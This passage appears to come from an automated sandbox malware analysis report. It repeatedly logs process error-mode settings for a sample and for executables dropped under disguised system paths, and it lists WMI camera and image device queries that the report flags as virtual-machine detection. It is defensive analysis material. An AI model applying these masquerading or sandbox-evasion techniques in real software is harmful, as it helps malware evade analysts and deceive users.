                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
